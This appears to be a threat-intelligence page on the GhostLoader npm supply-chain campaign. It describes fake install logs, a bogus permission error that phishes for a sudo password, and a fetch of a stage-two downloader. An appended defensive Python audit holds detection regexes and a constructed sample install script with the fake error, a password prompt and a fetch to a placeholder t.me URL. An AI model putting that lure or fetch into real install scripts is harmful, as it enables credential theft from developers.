GhostLoader staged npm install payload activity
Malware Activity
Summary
GhostLoader is now being delivered through staged npm install scripts, turning routine package installation into a route for data theft and cryptocurrency wallet targeting. The chain uses fake install logs and a bogus permissions error to push developers into revealing a sudo/root password. After that step, the malware retrieves a downloader that connects to C2 infrastructure and fetches the final payload. The result is a remote access trojan that can harvest data, focus on wallets, and wait for further instructions.
Related Happenings
Malware-Slop malicious npm file-theft campaign
Campaign
First: 27.05.2026 18:44
Last: 27.05.2026 18:44
Sources 1
About this happening:
The **Malware-Slop** campaign is distributing a malicious **npm** package that steals local files from installers, creating an unauthorized data-transfer risk for users of **Anthr...
TrapDoor trap-core.js credential-stealing package malware
Malware Activity
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
Node-ipc malicious versions with stealer/backdoor payload
Malware Activity
First: 14.05.2026 20:22
Last: 14.05.2026 20:22
Sources 1
About this happening:
Three **node-ipc** releases now carry an **obfuscated stealer/backdoor** that can harvest **developer and cloud secrets** from any system that loads the package. The malicious cod...
Filemanager backdoor delivered on compromised cPanel environments
Malware Activity
First: 11.05.2026 20:54
Last: 11.05.2026 20:54
Sources 1
About this happening:
The **Filemanager** backdoor is being deployed on **compromised cPanel/WHM systems**, giving attackers **remote command execution** and shell access. It is delivered through a **s...
PyTorch Lightning hit by network compromise
Incident
First: 04.05.2026 20:15
Last: 04.05.2026 20:15
Sources 1
About this happening:
A **malicious PyTorch Lightning release** on **PyPI** created a supply-chain compromise that can steal credentials as soon as the package is imported. The backdoored **version 2.6...
Timeline
24.03.2026 14:00 · 2 articles
ReversingLabs identifies malicious npm packages published by mikilanjillo
Initial Disclosure: Security researchers identify seven malicious npm packages published by mikilanjillo, including react-performance-suite, react-state-optimizer-core, react-fast-utilsa, ai-fast-auto-trader, pkgnewfefame1, carbon-mac-copy-cloner, and coinbase-desktop-sdk, that disguise their behavior with fake npm install logs, trigger a bogus write-permissions error for "/usr/local/lib/node_modules," phish for sudo/root credentials, fetch a second-stage downloader from Telegram or Teletype.in, and deploy GhostLoader and a remote access trojan aimed at cryptocurrency wallets and sensitive data.
- Ghost Campaign Uses 7 npm Packages to Steal Crypto Wallets and Credentials — thehackernews.com — 24.03.2026 14:00
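As an added example (not from the source article or from ReversingLabs' research), the following Python audit flags an npm package whose lifecycle scripts carry the lure described in the summary and in the timeline entry: a bogus write-permission error for /usr/local/lib/node_modules, a sudo password prompt, and a fetch from Telegram or Teletype.in. The package name, script contents and the t.me URL in the sample are constructed placeholders.

```python
"""Audit an npm package's install hooks for the GhostLoader-style lure.

Added example, not the page's or any vendor's code. The indicator strings
encode the behaviour described on the page; they are a starting point,
not a complete signature set. Run `audit_package` over an extracted
package tarball in practice.
"""
import json
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall")

# Finding label -> pattern. Bodies are scanned with DOTALL so the EACCES
# line and the path line may sit on separate lines, as in real npm output.
INDICATORS = {
    "fake-permission-error": re.compile(
        r"EACCES.*?/usr/local/lib/node_modules|/usr/local/lib/node_modules.*?EACCES", re.S),
    "sudo-password-prompt": re.compile(r"(?:\[sudo\]|sudo|root)\s*password", re.I),
    "telegram-teletype-fetch": re.compile(
        r"https?://(?:t\.me|api\.telegram\.org|telegra\.ph|teletype\.in)/", re.I),
}

def audit_package(package_json: str, files: dict) -> list:
    """Return sorted (hook, finding) pairs.

    package_json: text of package.json. files: path -> content of the
    extracted package, used to read local scripts the hook invokes.
    """
    manifest = json.loads(package_json)
    findings = set()
    for hook, command in manifest.get("scripts", {}).items():
        if hook not in LIFECYCLE_HOOKS:
            continue  # "test", "build", etc. do not run on install
        findings.add((hook, "lifecycle-hook-present"))
        bodies = [command]  # inline command plus any local script it runs
        for path in re.findall(r"(?:node|sh|bash)\s+(\S+)", command):
            bodies.append(files.get(path.lstrip("./"), ""))
        for label, pattern in INDICATORS.items():
            if any(pattern.search(body) for body in bodies):
                findings.add((hook, label))
    return sorted(findings)

# Constructed sample: a postinstall hook running a local script that prints
# a fake npm log, a bogus EACCES error, a sudo prompt and a stage-two fetch.
SAMPLE_MANIFEST = json.dumps({
    "name": "example-perf-suite",  # placeholder, not a real package
    "version": "1.0.0",
    "scripts": {"postinstall": "node ./scripts/setup.js", "test": "jest"},
})
SAMPLE_FILES = {"scripts/setup.js": (
    "console.log('added 212 packages in 4s');\n"
    "console.error('npm ERR! code EACCES');\n"
    "console.error('npm ERR! path /usr/local/lib/node_modules');\n"
    "process.stdout.write('[sudo] password for user: ');\n"
    "fetch('https://t.me/PLACEHOLDER');\n"  # constructed placeholder URL
)}
```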